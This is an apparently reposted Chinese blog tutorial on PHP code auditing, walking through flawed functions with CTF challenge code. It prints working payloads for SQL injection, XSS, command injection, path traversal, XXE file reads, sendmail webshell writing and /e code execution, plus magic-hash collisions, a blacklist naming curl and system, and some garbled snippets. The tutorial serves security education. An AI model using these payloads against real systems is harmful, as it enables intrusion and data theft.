php代码审计_PHP代码审计常见漏洞点

最新推荐文章于 2022-06-17 14:38:02 发布
最新推荐文章于 2022-06-17 14:38:02 发布
阅读量709 收藏 1
点赞数
文章标签: php代码审计 php代码审计工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39875192/article/details/111289456
版权

点击蓝字,关注我们

本文作者:Peiqi (团队成员)
本文字数:6300

阅读时长:30min

附件/链接:点击查看原文下载

声明:请勿用作违法用途,否则后果自负

本文属于WgpSec原创奖励计划,未经许可禁止转载

关于CMS和CTF中的PHP代码审计部分常见的函数缺陷

in_array函数缺陷

class Challenge {
const UPLOAD_DIRECTORY = './solutions/';
private $file;
private $whitelist;

public function __construct($file) {
$this->file = $file;
$this->whitelist = range(1, 24);
  }

public function __destruct() {
if (in_array($this->file['name'], $this->whitelist)) {
      move_uploaded_file(
$this->file['tmp_name'],
self::UPLOAD_DIRECTORY . $this->file['name']
      );
    }
  }
}

$challenge = new Challenge($_FILES['solution']);

我们要注意到的漏洞位置是

(1) $this->whitelist = range(1, 24);

(2) if (in_array($this->file['name'], $this->whitelist)) {
      move_uploaded_file(
$this->file['tmp_name'],
self::UPLOAD_DIRECTORY . $this->file['name']
      );

(1)这里判断文件名是否存在于1~24之间

(2)检测上传的文件名是否通过$this->whitelist = range(1, 24);的检测

我们具体看一下in_array()函数的解析

定义和用法
in_array() 函数搜索数组中是否存在指定的值

语法
bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )

参数	描述
needle	    必需。规定要在数组搜索的值。
haystack	必需。规定要搜索的数组。
strict	    可选。如果该参数设置为 TRUE,则 in_array() 函数检查搜索的数据与数组的值的类型是否相同。

返回值:	如果在数组中找到值则返回 TRUE,否则返回 FALSE。

这里因为使用了in_array函数,但是并没有使用函数的第三个参数,也就是说没有对两个变量的类型进行检测,所以如果我们上传文件 7shell.php,会被转化为数字7,导致通过检测,成功上传木马文件

CTF题型

//index.php
<?php include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);if ($conn->connect_error) {die("连接失败: ");
}
$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);
}
$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";if (!in_array($id, $whitelist)) {die("id $id is not in whitelist.");
}
$result = $conn->query($sql);if($result->num_rows > 0){
    $row = $result->fetch_assoc();echo "
1">";foreach ($row as $key => $value) {echo "
$key

";echo "
$value

";
}echo "
";
}else{die($conn->error);
}?> 
//config.php
<?php   
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);foreach($back_list as $hack){if(preg_match("/$hack/i", $value))die("$hack detected!");
    }return $value;
}
# 搭建CTF环境使用的sql语句
create database day1;
use day1;
create table users (
id int(6) unsigned auto_increment primary key,
name varchar(20) not null,
email varchar(30) not null,
salary int(8) unsigned not null );

INSERT INTO users VALUES(1,'Lucia','Lucia@hongri.com',3000);
INSERT INTO users VALUES(2,'Danny','Danny@hongri.com',4500);
INSERT INTO users VALUES(3,'Alina','Alina@hongri.com',2700);
INSERT INTO users VALUES(4,'Jameson','Jameson@hongri.com',10000);
INSERT INTO users VALUES(5,'Allie','Allie@hongri.com',6000);

create table flag(flag varchar(30) not null);
INSERT INTO flag VALUES('HRCTF{1n0rrY_i3_Vu1n3rab13}');

我们主要看这个函数

function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
foreach($back_list as $hack){
if(preg_match("/$hack/i", $value))
die("$hack detected!");
    }
return $value;
}

这里使用stop_hack过滤一些危险的函数

看到给一个GET请求可控

$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
die("id $id is not in whitelist.");
}

通过GET的id,通过stop_hack过滤后拼接在sql语句中查询

这里通过报错注入即可得到Flag

and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))

漏洞原因:
使用不安全的in_array,并且没有开启第三个检测参数类型,导致通过检测,形成任意文件上传

filter_var函数缺陷

// composer require "twig/twig"
require 'vendor/autoload.php';

class Template {
private $twig;

public function __construct() {
    $indexTemplate = '' .
'Next slide »';

// Default twig setup, simulate loading
// index.html file from disk
    $loader = new Twig\Loader\ArrayLoader([
'index.html' => $indexTemplate
    ]);
$this->twig = new Twig\Environment($loader);
  }

public function getNexSlideUrl() {
    $nextSlide = $_GET['nextSlide'];
return filter_var($nextSlide, FILTER_VALIDATE_URL);
  }

public function render() {
echo $this->twig->render(
'index.html',
      ['link' => $this->getNexSlideUrl()]
    );
  }
}

(new Template())->render();

这里是一段PHP的模板引擎Twig,使用的是escape和filter_var两个过滤方法

但是这里并不是绝对的安全,因为escape过滤器的本质是通过PHP内置函数htmlspecialchars实现的

我们看一下函数的定义

定义和用法
htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。
预定义的字符是:
& (和号)成为 &
" (双引号)成为 "
' (单引号)成为 '
< (小于)成为 >
> (大于)成为 <

string htmlspecialchars ( string $string [, int $flags = ENT_COMPAT | ENT_HTML401 [, string$encoding = ini_get("default_charset") [, bool $double_encode = TRUE ]]] )
提示:要把特殊的 HTML 实体转换回字符,请使用 htmlspecialchars_decode() 函数。

例如

<?php 
$str = "This is some bold text.";echo htmlspecialchars($str);?>

输出在页面上


This is some >b/b< text.

filter_var函数过滤nextSlide变量

并且使用FILTER_VALIDATE_URL过滤器判断是否为一个合法的url

filter_var :(PHP 5 >= 5.2.0, PHP 7)

功能 :使用特定的过滤器过滤一个变量

定义 :mixed filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] )

这里就可以使用JavaScript的伪协议来xss攻击

?url=javascript://comment%250aalert(1)

这里的//表示这注释掉后面的所有内容,但是对%进行编码后编为%25

当解码时会构造为%0a进行换行,alert函数变为第二行执行,点击标签即可触发xss

CTF题型

// index.php
<?php  
$url = $_GET['url'];if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
    $site_info = parse_url($url);if(preg_match('/sec-redclub.com$/',$site_info['host'])){
        exec('curl "'.$site_info['host'].'"', $result);echo "

You have curl {$site_info['host']} successfully!

"
;echo implode(' ', $result);
}else{die("

Error: Host not allowed

");
}
}else{echo "

Just curl sec-redclub.com!

For example:?url=http://sec-redclub.com

";
}?> 
// f1agi3hEre.php
<?php   
$flag = "HRCTF{f1lt3r_var_1s_s0_c00l}"?>

虽然进行了过滤,但是依然可以构造危险函数获取flag

syst1m://"|ls;"sec-redclub.com
syst1m://"|cat

== 与 === 弱类型绕过

=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较

== 在进行比较的时候,会先将字符串类型转化成相同,再比较

(如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行)

例如

<?php 
var_dump("admin" == 0);  //true
var_dump("1admin"== 1);  //true
var_dump("admin1"== 1);  //false
var_dump("admin1"== 0);  //true
var_dump("0e123456"=="0e4456789"); //true?>

根据上面的可以看到

admin为字符型,与0进行比较时,强制转换类型为数字型,变成 0,导致返回True

同理1admin会变成1,而admin1则为0

"0e123456"=="0e456789"相互比较的时候,会将0e这类字符串识别为科学计数法的数字,0的无论多少次方都是零,所以相等

<?php 
$test=1 + "10.5";     //$test=11.5(float)
$test=1+"-1.3e3";     //$test=-1299(float)
$test=1+"bob-1.3e3";  //$test=1(int)
$test=1+"2admin";     //$test=3(int)
$test=1+"admin2";     //$test=1(int)?>

通过这里也可以更好的理解

CTF题型

md5(hash)弱类型绕过
<?php if (isset($_GET['Username']) && isset($_GET['password'])) {
    $logined = true;
    $Username = $_GET['Username'];
    $password = $_GET['password'];if (!ctype_alpha($Username)) {$logined = false;}if (!is_numeric($password) ) {$logined = false;}if (md5($Username) != md5($password)) {$logined = false;}if ($logined){echo "successful";
      }else{echo "login failed!";
        }
    }?>

输入一个字符串和数字类型,并且他们的md5值相等,就可以成功执行下一步语句

所以只要让md5后的值开头含有0e则会转换为0

md5('240610708') ------> 0e462097431906509019562988736854
md5('QNKCDZO')   ------> 0e830400451993494058024219903391

md5('240610708') == md5('QNKCDZO')

这样即可绕过检测

# 部分的MD5绕过方式
QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

s878926199a
0e545993274517709034328855841020

s1091221200a
0e940624217856561557816327384675

s1885207154a
0e509367213418206700842008763514
json绕过
<?php if (isset($_POST['message'])) {
    $message = json_decode($_POST['message']);
    $key ="*********";if ($message->key == $key) {echo "flag";
    }else {echo "fail";
    }
 }else{echo "~~~~";
 }?>

这里同样也看到了 ==符号

不知道key的值,但是我们知道key为字符

所以绕过只需要 0=='admin'即可绕过

payload:

message={"key":0}

strcmp漏洞绕过 php -v <5.3
<?php 
    $password="***************"if(isset($_POST['password'])){if (strcmp($_POST['password'], $password) == 0) {echo "Right!!!login success";nexit();
        } else {echo "Wrong password..";
        }?>

strcmp是比较两个字符串,如果str10 如果两者相等 返回0

那我们只需要传入数组password[]=xxx就可以绕过了

MD5数组绕过

include_once “flag.php”;
ini_set(“display_errors”, 0);
$str = strstr($_SERVER[‘REQUEST_URI’], ‘?’);
$str = substr($str,1);
$str = str_replace(‘key’,”,$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag.”取得flag”;
}
?>
md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。

实例化任意对象漏洞

function __autoload($className) { //自动加载
include $className;
}

$controllerName = $_GET['c'];
$data = $_GET['d'];  //获取get的c与d作为类名与参数

if (class_exists($controllerName)) {
  $controller = new $controllerName($data['t'], $data['v']);
  $controller->render();
} else {
echo 'There is no page with this name';
}

class HomeController {
private $template;
private $variables;

public function __construct($template, $variables) {
$this->template = $template;
$this->variables = $variables;
  }

public function render() {
if ($this->variables['new']) {
echo 'controller rendering new response';
    } else {
echo 'controller rendering old response';
    }
  }
}
如果存在如果程序存在 __autoload函数,class_exists函数就会自动调用方法
payload : /?c=../../../../etc/passwd

CTF题型

<?php class NotFound{function __construct(){die('404');
    }
}
spl_autoload_register(function ($class){new NotFound();
    }
);
$classname = isset($_GET['name']) ? $_GET['name'] : null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;if(class_exists($classname)){
    $newclass = new $classname($param,$param2);
    var_dump($newclass);foreach ($newclass as $key=>$value)echo $key.'=>'.$value.'
';
}
当class_exists时,调用autoload方法,但是autoload方法不存在,新建了一个spl_autoload_register方法,类似__autoload方法

列出文件(GlobIterator类)
public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )

第一个参数为要搜索的文件名,第二个参数为第二个参数为选择文件的哪个信息作为键名

payload : http://127.0.0.1:8888/index.php?name=GlobIterator&param=./*.php&param2=0

读取flag

http://127.0.0.1:8888/index.php?name=SimpleXMLElement&param=%3C?xml%20version=%221.0%22?%3E%3C!DOCTYPE%20ANY%20[%3C!ENTITY%20xxe%20SYSTEM%20%22php://filter/read=convert.base64-encode/resource=f1agi3hEre.php%22%3E]%3E%3Cx%3E%26xxe;%3C/x%3E&param2=2

strpos使用不当引发漏洞

class Login {
public function __construct($user, $pass) {
$this->loginViaXml($user, $pass);
  }

public function loginViaXml($user, $pass) {
if (
      (!strpos($user, ') || !strpos($user, '>')) &&
      (!strpos($pass, ') || !strpos($pass, '>'))
    ) {
      $format = '<?xml version="1.0"?>' .'';
      $xml = sprintf($format, $user, $pass);
      $xmlElement = new SimpleXMLElement($xml);// Perform the actual login.$this->login($xmlElement);
    }
  }
}new Login($_POST['username'], $_POST['password']);
strpos定义
主要是用来查找字符在字符串中首次出现的位置。

查找代码中是否含有的特殊符号,strpos在没找到指定字符时会返回flase,如果第一个字符找到就返回0,0的取反为1,就可以注入xml进行注入了

注入代码
user=escapeshellarg与escapeshellcmd使用不当
scapeshellcmd: 除去字串中的特殊符号
escapeshellarg 把字符串转码为可以在 shell 命令里使用的参数
class Mailer {
private function sanitize($email) {
if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
return '';
    }

return escapeshellarg($email);
  }

public function send($data) {
if (!isset($data['to'])) {
      $data['to'] = 'none@ripstech.com';
    } else {
      $data['to'] = $this->sanitize($data['to']);
    }

if (!isset($data['from'])) {
      $data['from'] = 'none@ripstech.com';
    } else {
      $data['from'] = $this->sanitize($data['from']);
    }

if (!isset($data['subject'])) {
      $data['subject'] = 'No Subject';
    }

if (!isset($data['message'])) {
      $data['message'] = '';
    }

    mail($data['to'], $data['subject'], $data['message'],
'', "-f" . $data['from']);
  }
}

$mailer = new Mailer();
$mailer->send($_POST);

新建一个MAil类发送邮件(php内置寒湖是mail)

bool mail (
    string $to , 接收人
    string $subject , 邮件标题
    string $message [, 征文
    string $additional_headers [, 额外头部
    string $additional_parameters ]] 额外参数
)

(linux额外参数)

-O option = value

QueueDirectory = queuedir 选择队列消息

-X logfile

这个参数可以指定一个目录来记录发送邮件时的详细日志情况。

-f from email

这个参数可以让我们指定我们发送邮件的邮箱地址。

例如

<?php 
	$to = 'alala@qq.com';
	$subject = 'hello';
	$message = '<?php phpinfo()?>';
	$headers = 'CC: somebodyelse@qq.com'
	$options = '-OQueueDirectory=/tmp -X /var/www/html/rce.php';
	main($to, $#subject, $message, $headers, $options);?>

运行结果

17220 <<< To: Alice@example.com
17220 <<< Subject: Hello Alice!
17220 <<< X-PHP-Originating-Script: 0:test.php
17220 <<< CC: somebodyelse@example.com
17220 <<<
17220 <<< <?php phpinfo(); ?>
17220 <<< [EOF]
filter_var()问题(FILTER_VALIDATE_EMAIL)

ilter_var() 问题在于,我们在双引号中嵌套转义空格仍然能够通过检测。同时由于底层正则表达式的原因,我们通过重叠单引号和双引号,欺骗 filter_val() 使其认为我们仍然在双引号中,这样我们就可以绕过检测

如 :”aaa’aaa”@example.com

escapeshellcmd()和escapeshellarg()

这两个函数会造成特殊字符逃逸

<?php 
	$param = ""'127.0.0.1' -v -d a=1";
	$a = escapeshellcmd($param);
	$b = escapeshellarg($a);
	$cmd = "curl".$b;
	var_dump($a)."\n";
	var_dump($b)."\n";
	var_dump($cmd)."\n";
	system($cmd)
?>

输出看一下

strings(21) "127.0.0.1\' -v -d a=1"
strings(26) "'127.0.0.1\'\'' -v -d a=1'"
strings(30) "curl'127.0.0.1\'\'' -v -d a=1"
sh: curl127.0.0.1\' -v -d a=1: comand nir found'

逃逸过程分析分析一下

传入127.0.0.1' -v -d a=1,escapeshellarg首先进行转义,处理为'127.0.0.1'\'' -v -d a=1',接着escapeshellcmd处理,处理结果为'127.0.0.1'\'' -v -d a=1\',\ 被解释成了 \ 而不再是转义字符

正则使用不当导致的路径穿越问题

class TokenStorage {
public function performAction($action, $data) {
switch ($action) {
case 'create':
$this->createToken($data);
break;
case 'delete':
$this->clearToken($data);
break;
default:
throw new Exception('Unknown action');
    }
  }

public function createToken($seed) {
    $token = md5($seed);
    file_put_contents('/tmp/tokens/' . $token, '...data');
  }

public function clearToken($token) {
    $file = preg_replace("/[^a-z.-_]/", "", $token);
    unlink('/tmp/tokens/' . $file);
  }
}

$storage = new TokenStorage();
$storage->performAction($_GET['action'], $_GET['data']);
preg_replace(函数执行一个正则表达式的搜索和替换)

payload

$action =delete$data = ../../config.php

preg_replace函数之命令执行

header("Content-Type: text/plain");

function complexStrtolower($regex, $value) {
return preg_replace(
'/(' . $regex . ')/ei',
'strtolower("\\1")',
    $value
  );
}

foreach ($_GET as $regex => $value) {
echo complexStrtolower($regex, $value) . "\n";
}

preg_replace(函数执行一个正则表达式的搜索和替换)

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

$pattern 存在 /e 模式修正符,允许代码执行
/e 模式修正符,是 preg_replace() 将 $replacement 当做php代码来执行

将GET请求传过来的参数通过complexStrtolower函数执行,preg_replace函数存在e修正符

payload

\S*=${phpinfo()}

研究文章(查看原文)

送一枚邀请码:592E279DFEDFD62215E085B49DD6C2E0

扫描关注公众号回复加群,和师傅们一起讨论研究~

扫码关注我们

3d1562a4632c7109ae3ec121b39c3a37.png

微信号:wgpsec

Twitter:@wgpsec

c703b67b3760d17ee523ad9aba1c7df6.gif

分享、在看与点赞,至少我要拥有一个吧

weixin_39875192
关注
PHP代码审计常见漏洞(一)
武天旭的博客
05-31 1065
经过漫长时间的迭代更新,内容从一开始的碎片化网罗搜集,到排版与整合划分,再到学习与实践验证,最后摒弃初始,用自己的语言与实践结论通俗的将它展现出来。强化知识技能的同时也为读者带来更好的阅读体验。 本篇介绍了以下代码安全问题:
php定时执行代码漏洞_常见PHP代码执行漏洞
weixin_35812176的博客
01-14 256
1. 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:echo `dir`;?>2. 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、include_once()、...
PHP代码审计基础篇(XSS 漏洞
qq_45521281的博客
05-20 1325
XSS 漏洞 XSS学名为跨站脚本攻击( Cross Site Scriptings),在Web漏洞中XSS是出现最多的漏洞,没有之一。这种漏洞有两种情况,一种是通过外部输入然后直接在浏览器端触发,即反射型XSS;还有一种则是先把利用代码保存在数据库或文件中,当Web程序读取利用代码并输出在页面上时触发漏洞,也就是存储型XSS。XSS攻击在浏览器端触发,大家对其危害认识往往停留在可以窃取cookie、修改页面钓鱼,等等。用一句话来说明该漏洞的危害就是:前端页面能做的事它都能做。 挖掘经验 挖掘XSS漏洞的关
PHP漏洞全解
04-15 1024
针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injecti...
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1867
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
php-java+代码审计+代码审计软件seay+程序员+挖+代码审计漏洞查找+生成代码审计报告
03-08
代码审计是确保软件质量、防止安全漏洞和提高代码可维护性的重要手段。 **Seay源代码审计系统** Seay源代码审计系统是一款专门针对PHP源代码的安全审计工具,由Seay团队开发。该系统2.1版本提供了更强大的审计功能...
php代码审计入坑实践.pdf
07-30
3. **seay源代码审计系统**:这是一款开源的PHP代码审计工具,可以帮助开发者检测潜在的安全漏洞。安装seay是为了提供自动化的审计支持,减轻手动审查的负担。 4. **rips源代码审计系统**:另一个强大的PHP审计工具...
PHP代码审计文档.zip
11-02
第19课:PHP代码审计之会话认证漏洞mp4 第18课:PHP伪协议mp4 第17课:PHP弱类型mp4 第16课:PHP代码审计之反序列化漏润mp4 第15课:PHP代码审计之变量盖漏洞mp4 第14课PHP代码审计之任意文件读取及删除漏洞mp4 第13课...
PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
基于正反向分析的SQL,XSS漏洞检测系统(php代码审计web版)
最新发布
07-19
基于正反向分析的SQL,XSS漏洞检测系统(php代码审计web版) 用户角色 管理员 admin 123456 模块介绍 登陆模块 sql文件静态分析模块 phparser树形处理,json返回处理结果 sql显示image模块 graphviz生成pdf文件...
PHP代码审计demo之熊海cms
热门推荐
Love&Share
08-16 1万+
php漏洞的利用依赖PHP版本、Web中间件版本与类型、操作系统类型和版本以及这些软件的配置等多因素,一下环境为:wamp(win10+apache2.4.39+mysql5.7.26+php5.2.17) 代码审计的四种方式: 1.函数回溯 2.追溯变量 3.功能 4.通读全文 这四种方法各有优缺,通读全文法会对整个cms体系有更深刻得了解,可以发现更隐秘的漏洞,以及逻辑漏洞。根据敏感函数来逆向追踪参数的传递过程,是目前使用得最多的一种方式,因 为大多数漏洞是由于函数的使用不当造成的。 下图为 熊海cm
CTF之PHP黑魔法总结
aiquan9342的博客
10-05 488
继上一篇php各版本的姿势(不同版本的利用特性),文章总结了php版本差异,现在在来一篇本地日记总结的php黑魔法,是以前做CTF时遇到并记录的,很适合在做CTF代码审计的时候翻翻看看。 一、要求变量原值不同但md5或sha1相同的情况下 1.0e开头的全部相等(==判断) 240610708 和 QNKCDZO md5值类型相似,但并不相同,在”==”相等操作符的运算下,结果返回...
php array =%3e变,PHP代码执行漏洞总结
weixin_39982236的博客
03-17 126
这篇文章介绍的内容是关于PHP代码执行漏洞总结,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下PHP代码执行漏洞总结ref : http://blog.csdn.net/kuangmang/article/details/27170309ref : http://blog.csdn.net/fuckcat_2333/article/details/521259511 代码执行函数ph...
in_array函数缺陷(原理+实战)
叶子的Blog
11-08 4012
函数缺陷原理 先看一段代码 这里可以很容易理解出,如果上传的文件名是1-24中的一个,那么就将文件进行上传。 下面是in_array()函数的定义。 in_array:(PHP 4, PHP 5, PHP 7) 功能 :检查数组中是否存在某个值 定义 : bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) 在 $haystack 中搜索 $needle ,如果第三个参数 $strict..
php中使用in_array易产生代码安全漏洞
温柔手的专栏
06-07 3254
执行上面的代码看看,你想说什么?我是惊出了冷汗的in_array常被老手们这样用做变量检查,但显然结果并不靠谱。为什么会这样呢?再试试这个问题似乎是PHP的默认类型转换造成的,数字与字符串比较时,字符串先被强制转成数字再进行了比较。真的是这个原因吗?爱较真的朋友请自行查看PHP源码,没准你还会发现其他问题。其实in_array
filter_var函数缺陷(CTF例题,附源码)
叶子的Blog
11-15 3344
基础知识 filter_var函数缺陷(原理+实践) 源代码 // index.php <?php $url = $_GET['url']; if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){ $site_info = parse_url($url); if(preg_match('/sec-redclub.com$/',$site_info['host'])){ exec('cu
红日安全代码审计Day2 - filter_var函数缺陷详解
qq_45951598的博客
11-30 583
这里写目录标题Day2题解filter_var($url, FILTER_VALIDATE_URL)parse_urlpreg_matchimplode Day2题解 <?php $url = $_GET['url']; // 获取一个url // isset() 函数用于检测变量是否已设置并且非 NULL。 if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){ // FILTER_VALIDATE_URL :把
剖析php数组对比函数(避坑篇)
技术需要沉淀,兴国需要科技!
06-17 493
两个数组的比对在日常编码过程中是最常用到的,稍微复杂的业务需求都需要用到array_diff_assoc
php get请求_ctf中关于php伪协议的考查
weixin_39928003的博客
11-30 511
原创:Archerx 合天智汇1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinclude('flag.php');$a= $_GET["a"];if(isset($a)&&(file_get_contents($a,'r'))=== 'this is tes...
PHP代码审计实战教程:漏洞分析与防御
14. PHP代码审计之目录穿越及文件包含漏洞(任务13):解释目录穿越和文件包含漏洞的原理,提供审计中的检查和防御措施。 15. PHP代码审计之文件上传漏洞(任务12):详细介绍文件上传过程中可能出现的安全问题和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值